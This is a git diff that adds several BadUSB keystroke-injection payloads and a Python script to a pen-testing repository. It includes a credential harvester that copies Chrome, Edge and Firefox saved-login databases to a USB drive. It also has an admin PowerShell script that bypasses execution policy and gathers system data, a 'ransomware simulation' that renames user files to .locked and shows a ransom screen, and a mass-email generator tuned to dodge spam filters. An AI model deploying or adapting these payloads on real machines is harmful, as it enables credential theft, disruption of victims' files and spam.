diff --git a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt new file mode 100644 index 00000000..0a33b3bd --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt @@ -0,0 +1,42 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%% +REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%% +REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%% +REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%% +REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 500 +STRING chrome +ENTER +DELAY 1000 +STRING https://mail.google.com/mail/u/0/#inbox?compose=new +ENTER +DELAY 5000 +DELAY 1000 +STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO} +DELAY 500 +TAB +TAB +STRING {YOUR SUBJECT NAME} +TAB +STRING Hi {THEIR NAME} +ENTER +ENTER +STRING {CONTENTS OF THE EMAIL} +ENTER +ENTER +STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES} +ENTER +ENTER +STRING Respectfully, +ENTER +ENTER +STRING {YOUR NAME} +ENTER +CTRL ENTER +DELAY 5000 +DELAY 1000 +ALT F4 +REM check out github.com/markcyber for more scripts diff --git a/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py b/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py new file mode 100644 index 00000000..16662391 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py @@ -0,0 +1,101 @@ +####################################################################################################################################### +####################################################################################################################################### +################# This script was created by github.com/MarkCyber (w/ assistance of ai) #################### +################# This is a python script to automatically create BadUSB scripts to auto send emails #################### +################# This takes a excel sheet with the columns named "Names" and "Emails" #################### +################# This script will then make a badusb script using the name + email of each person #################### +################# There are various subject options that will be chosen from, to minimize "spam" #################### +################# Change the signature to your name, and put subject options that fit your email #################### +################# Lastly, of course make sure to change the contents of the email to what you want #################### +####################################################################################################################################### +####################################################################################################################################### + +import pandas as pd +import random + +# Load the Excel file, make sure it has the same name (or change the name in this script) +file_path = 'NameAndEmails.xlsx' +data_df = pd.read_excel(file_path) + +# Your excel should have 2 columns. Names, and Emails. +data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True) +data_cleaned_df.columns = ['Name', 'Email'] + +# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not) +subject_options = [ + "Placeholder for subject option 1", + "Placeholder for subject option 2", + "Placeholder for subject option 3", + "Placeholder for subject option 4", + "Placeholder for subject option 5", + "Placeholder for subject option 6", + "Placeholder for subject option 7" +] + +# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided. +# Just modify the actual email body and sender name to fit your needs +email_body_template = """ +Hi {name}, + +Placeholder for email body. + +Warm Regards, +Sender Name +""" + +# Function to generate BadUSB script +def generate_badusb_script_with_placeholders_single_file(data_df): + script_template = [ + "DELAY 1000", + "GUI r", + "DELAY 500", + "STRING chrome", + "ENTER", + "DELAY 1000", + "STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in. + "ENTER", + "DELAY 5000" + ] + + scripts = script_template + + for index, row in data_df.iterrows(): + name = row['Name'] + email = row['Email'] + subject = random.choice(subject_options) + random_delay = random.randint(10000, 25000) + + email_body_lines = email_body_template.format(name=name).strip().split('\n') + email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()] + + email_script = [ + "DELAY 1000", + f"STRING {email}", + "DELAY 500", + "TAB", + "TAB", + f"STRING {subject}", + "TAB" + ] + email_body_lines + [ + "ENTER", + "CONTROL ENTER", + "DELAY 5000", + f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam + "ALT F4" + ] + + scripts += email_script + + return "\n".join(scripts) + +# Generate the BadUSB script with placeholders and proper send command in a single file +final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df) + +# Save the script to a file +final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script +with open(final_script_file_path, 'w') as file: + file.write(final_script_with_placeholders) + +print(f"Script saved to {final_script_file_path}") + +#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts diff --git a/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt new file mode 100644 index 00000000..d7a27cea --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt @@ -0,0 +1,54 @@ +REM ################################################################################################################## +REM ############## This script was created by github.com/markcyber ############## +REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ############## +REM ############## The extracted data will require decryption ############## +REM ################################################################################################################## +REM Open PowerShell +DELAY 1000 +GUI r +DELAY 500 +STRING powershell +DELAY 500 +ENTER +DELAY 1000 +REM Check if the USB drive exists +STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; +STRING if ($usbDrive -ne $null) { +ENTER +DELAY 500 +STRING cd $usbDrive; +ENTER +DELAY 500 +STRING mkdir BrowserData; +ENTER +DELAY 500 +STRING cd BrowserData; +ENTER +DELAY 500 +REM Copy Chrome Login Data to USB +STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; +STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } +ENTER +DELAY 500 +REM Copy Firefox Login Data to USB +STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; +STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } +ENTER +DELAY 500 +REM Copy Edge Login Data to USB +STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; +STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } +ENTER +DELAY 500 +STRING } +ENTER +DELAY 500 +REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC) +STRING echo off | clip +ENTER +DELAY 500 +REM Close PowerShell +STRING exit +ENTER +DELAY 500 +REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff diff --git a/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt b/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt new file mode 100644 index 00000000..51e1b0d0 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt @@ -0,0 +1,630 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +REM Open Start Menu +CONTROL ESCAPE +DELAY 2000 +STRING powershell +REM Navigate to the context menu to run PowerShell as an administrator +DELAY 500 +RIGHTARROW +DELAY 100 +DOWNARROW +DELAY 100 +ENTER +DELAY 3000 +ALT Y +DELAY 5000 +REM Set PowerShell Execution Policy to Bypass +DELAY 1000 +STRING set-executionpolicy bypass -scope process -force +DELAY 200 +ENTER +DELAY 200 +REM Create the PowerShell script in memory and execute it +DELAY 200 +STRING $usbName = "MYUSB" +DELAY 200 +ENTER +DELAY 200 +STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter +DELAY 200 +ENTER +DELAY 200 +STRING if ($usbDrive) { +DELAY 200 +ENTER +DELAY 200 +STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName +DELAY 200 +ENTER +DELAY 200 +STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner +DELAY 200 +ENTER +DELAY 200 +STRING New-Item -ItemType Directory -Path $directoryPath +DELAY 200 +ENTER +DELAY 200 +STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt" +DELAY 200 +ENTER +DELAY 200 +STRING "" > $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING function check-passwordpolicy { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING net accounts +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking password policy: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function audit-services { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-service | select-object name, displayname, status, starttype +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error auditing services: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-networksettings { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-netipconfiguration +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking network settings: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-softwarevulnerabilities { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking software vulnerabilities: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-cve { +DELAY 200 +ENTER +DELAY 200 +STRING param ( +DELAY 200 +ENTER +DELAY 200 +STRING [string]$productname, +DELAY 200 +ENTER +DELAY 200 +STRING [string]$version +DELAY 200 +ENTER +DELAY 200 +STRING ) +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay = 2 +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING $response = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($response.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $response.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking CVEs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING if ($_.Exception -match '403') { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..." +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds 60 +DELAY 200 +ENTER +DELAY 200 +STRING $retryResponse = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($retryResponse.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $retryResponse.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function analyze-logs { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-eventlog -logname system -newest 100 +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error analyzing logs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-openports { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netstat -an +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking open ports: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-missingupdates { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Checking Windows Update logs..." +DELAY 200 +ENTER +DELAY 200 +STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log" +DELAY 200 +ENTER +DELAY 200 +STRING Get-WindowsUpdateLog -LogPath $updateLogPath +DELAY 200 +ENTER +DELAY 200 +STRING write-output "WindowsUpdate.log written to $updateLogPath" +DELAY 200 +ENTER +DELAY 200 +STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error getting Windows Update log: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-firewallstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netsh advfirewall show allprofiles +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking firewall status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-smbv1status { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-windowsoptionalfeature -online -featurename smb1protocol +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking SMBv1 status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-antivirusstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-mpcomputerstatus +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking antivirus status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING check-passwordpolicy >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING audit-services >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-networksettings >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-softwarevulnerabilities >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING analyze-logs >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-openports >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-missingupdates >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-firewallstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-smbv1status >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-antivirusstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +REM Dynamically identify critical software from running processes and scheduled tasks +STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique +DELAY 200 +ENTER +DELAY 200 +STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique +DELAY 200 +ENTER +DELAY 200 +REM Combine running software and scheduled tasks +STRING $softwareList = @() +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($process in $runningSoftware) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += $process.Name +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($task in $scheduledTasks) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun) +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +REM Remove duplicates and empty entries +STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" } +DELAY 200 +ENTER +DELAY 200 +REM Check CVEs for identified software +STRING foreach ($software in $softwareList) { +DELAY 200 +ENTER +DELAY 200 +STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion +DELAY 200 +ENTER +DELAY 200 +STRING if ($version) { +DELAY 200 +ENTER +DELAY 200 +STRING check-cve -productname $software -version $version >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10) +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Results saved to USB drive." +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error: USB drive MYUSB not found." +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING invoke-command -scriptblock $script +DELAY 200 +ENTER +DELAY 20000 +REM check out github.com/markcyber for more badusb/pen testing scripts and tools diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt new file mode 100644 index 00000000..b35bd533 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt @@ -0,0 +1,91 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 1000 +REM opens powershell (this is for windows machines) +STRING powershell +ENTER +DELAY 3000 +REM Define the locations using correct SpecialFolder enumerations +STRING $folders = @( +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::Desktop, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::MyPictures, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::MyMusic, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::Downloads +DELAY 500 +ENTER +DELAY 500 +STRING ) +DELAY 500 +ENTER +DELAY 500 +REM Iterate over each location +STRING foreach ($folder in $folders) { +DELAY 500 +ENTER +DELAY 500 +STRING $path = [Environment]::GetFolderPath($folder) +DELAY 500 +ENTER +DELAY 500 +REM Get all files in the path and rename them +STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') } +DELAY 500 +ENTER +DELAY 500 +STRING } +DELAY 500 +ENTER +DELAY 2000 +REM Display ransomware message +STRING Add-Type -AssemblyName PresentationFramework +DELAY 500 +ENTER +DELAY 500 +STRING $Window = New-Object System.Windows.Window +DELAY 500 +ENTER +DELAY 500 +STRING $Window.WindowStartupLocation = 'CenterScreen' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.WindowState = 'Maximized' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.Topmost = $true +DELAY 500 +ENTER +DELAY 500 +STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.ShowDialog() +DELAY 500 +ENTER +DELAY 2000 +STRING exit +DELAY 500 +ENTER +REM check out my github at github.com/markcyber for more badusb & hacking type tools diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2-cleanup.txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2-cleanup.txt new file mode 100644 index 00000000..3be26299 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2-cleanup.txt @@ -0,0 +1,62 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 2000 +STRING powershell +ENTER +REM increased delays to make sure each command can go through even on slower computers +DELAY 6000 +REM Define the locations using correct SpecialFolder enumerations +STRING $folders = @( +DELAY 1000 +ENTER +DELAY 1000 +STRING [System.Environment+SpecialFolder]::Desktop, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::MyPictures, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::MyMusic, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::Downloads +DELAY 1000 +ENTER +DELAY 2000 +STRING ) +DELAY 1000 +ENTER +DELAY 3000 +REM Iterate over each location +STRING foreach ($folder in $folders) { +DELAY 1000 +ENTER +DELAY 1000 +STRING $path = [Environment]::GetFolderPath($folder) +DELAY 1000 +ENTER +DELAY 4000 +REM Get all .locked files in the path and rename them back +STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') } +DELAY 2000 +ENTER +DELAY 5000 +STRING } +DELAY 1000 +ENTER +DELAY 4000 +STRING exit +DELAY 1000 +ENTER +REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff